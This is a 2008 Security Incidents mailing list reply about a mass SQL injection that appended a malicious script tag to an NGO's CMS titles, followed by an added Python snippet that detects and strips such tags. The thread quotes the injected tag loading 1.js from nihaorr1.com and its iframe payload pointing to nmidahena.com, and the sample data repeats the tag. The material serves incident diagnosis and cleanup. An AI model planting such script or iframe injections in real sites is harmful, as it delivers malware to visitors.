Security Incidents mailing list archives

Re: Mysterious JavaScript appearance in website database


From: Jon Oberheide <jon () oberheide org>
Date: Mon, 14 Apr 2008 19:53:17 -0400

Looks like an SQL injection attack.

Take a look in your MS-SQL database at the affected entries and I bet
you'll see the nmidahena reference.

Since this is a widespread, automated attack that has affected other
sites, it's unlikely it was targeted at your specific organization or
custom CMS.  Give your codebase a thorough audit for SQL injection
vectors.

Regards,
Jon Oberheide

On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to 
the titles of much of the content on our website:

   <script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content containing a 
reference to this script are identical, right down to the 1/100 second.

The contents of the script apparently attempt to open an iframe to a
non-existent domain, "nmidahena.com":

   document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");

I haven't found any reports of a new worm, etc. that might account for 
this, but when I Google "nmidahena.com" I get over 100,000 hits for
other sites on which this script is present.

We are running a custom-developed CMS with MS-SQL Server 2000 as the 
backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT 
Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes 
released prior to NT4's end-of-life declaration by MS, for what it's worth.)

Anyone have an idea what might have caused this?
-- 
Jon Oberheide <jon () oberheide org>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE
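
An added example, not part of the original thread or written by either poster: one way to carry out the "look at the affected entries" check from the reply on an export of the CMS content table. It flags titles carrying a script tag that loads from an external host, produces the cleaned title, and counts findings per last-modified value, since the original post notes that all affected rows shared one timestamp. The row layout (id, title, last_modified), the function names and the sample rows are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# <script> element with a src attribute, quoted or unquoted (the tag in the
# post uses an unquoted src).
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?(?P<src>[^\s\"'>]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

# Constructed sample rows: (id, title, last_modified). Hypothetical layout.
SAMPLE_ROWS = [
    (1, "Annual report<script src=http://www.nihaorr1.com/1.js></script>",
     "2008-04-13 01:07:38.030"),
    (2, "Press contacts<script src=http://www.nihaorr1.com/1.js></script>",
     "2008-04-13 01:07:38.030"),
    (3, "About us", "2008-03-02 14:11:05.120"),
    (4, 'Map <script src="/js/map.js"></script>', "2008-02-20 09:30:00.000"),
]

def scan_rows(rows, allowed_hosts=frozenset()):
    """Return (findings, stamps): flagged rows and a count per last_modified."""
    findings = []
    for row_id, title, modified in rows:
        hosts = []

        def strip(match):
            # Relative src values have no hostname and are left in place.
            host = (urlparse(match.group("src")).hostname or "").lower()
            if not host or host in allowed_hosts:
                return match.group(0)
            hosts.append(host)
            return ""

        cleaned = SCRIPT_TAG.sub(strip, title or "").rstrip()
        if hosts:
            findings.append({"id": row_id, "hosts": sorted(set(hosts)),
                             "modified": modified, "cleaned": cleaned})
    # Many findings under one timestamp point to a single bulk update.
    stamps = Counter(f["modified"] for f in findings)
    return findings, stamps

if __name__ == "__main__":
    found, stamps = scan_rows(SAMPLE_ROWS)
    for f in found:
        print(f["id"], f["hosts"], f["modified"], repr(f["cleaned"]))
    print(stamps.most_common(1))
```

Review the flagged rows and the cleaned values before writing anything back to the database.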
